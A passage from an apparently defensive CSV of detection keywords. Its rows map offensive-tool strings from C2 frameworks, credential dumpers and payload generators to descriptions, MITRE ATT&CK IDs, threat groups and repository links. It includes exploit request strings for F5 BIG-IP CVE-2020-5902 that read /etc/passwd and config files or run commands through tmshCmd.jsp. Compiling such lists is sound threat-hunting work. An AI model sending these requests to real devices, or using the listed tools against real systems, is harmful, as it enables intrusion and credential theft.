TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_python_shellcode*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_raw_payload*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*generate_spoofed_args_exe*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_stageless*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_unmanaged_exe operation1 *.exe,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_x64_shellcode*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_x86_shellcode*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*GenerateDllBase64Hta*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*GenerateExeBase64*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*GenerateForcedBrowseWordlist.py*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp Suite,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*generateInjectBinFile*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Generate-Macro.ps1*,offensive_tool_keyword,Generate-Macro,Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.,T1566 - T1059 - T1086 - T1056 - T1567,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/enigma0x3/Generate-Macro,1,1,N/A,N/A,7,665,218,2016-10-27T20:48:59Z,2015-01-09T01:34:22Z -*GenerateParameterWordlist.py*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*GenerateReverseTcpDrone*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*generate-rotating-beacon.*,offensive_tool_keyword,cobaltstrike,beacon generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/eddiezab/aggressor-scripts/tree/master,1,1,N/A,10,10,1,0,2021-01-29T21:01:58Z,2021-01-29T21:00:26Z -*GeneratesShellcodeFromPEorDll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*GenericC2Relay.cs*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*Genetic-Malware/Ebowla*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*genHTA*,offensive_tool_keyword,genHTA,Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator,T1564 - T1059 - T1027 - T1055,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/genHTA,1,0,N/A,N/A,1,15,3,2017-03-16T21:49:59Z,2017-06-12T10:58:35Z -*genmkvpwd *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*gentilkiwi (Benjamin DELPY)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*gentilkiwi*,offensive_tool_keyword,mimikatz,author of mimikatz and multiple other windows exploitation tools,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*GeorgePatsias/ScareCrow*,offensive_tool_keyword,cobaltstrike,Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GeorgePatsias/ScareCrow-CobaltStrike,1,1,N/A,10,10,437,68,2022-07-15T09:39:18Z,2021-06-24T10:04:01Z -*georgesotiriadis/Chimera*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,1,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET */tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET *https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=whoami*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*get_beacon(*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*get_BeaconHealthCheck_settings*,offensive_tool_keyword,cobaltstrike,This aggressor script uses a beacon's note field to indicate the health status of a beacon.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/beacon_health_check,1,1,N/A,10,10,138,25,2021-09-29T20:20:52Z,2021-07-08T13:28:11Z -*get_c2_messages*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_c2server_all*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_cmd_from_task_id*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_dns_dnsidle*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_dns_sleep*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*Get_DPAPI_Protected_Files*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*get_filezilla_creds.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*get_hijackeable_dllname*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*get_implants_all*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_injection_techniques*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*get_keystrokes.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*get_list_of_implant_text*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*get_masterkeys_from_lsass*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*get_newimplanturl*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - 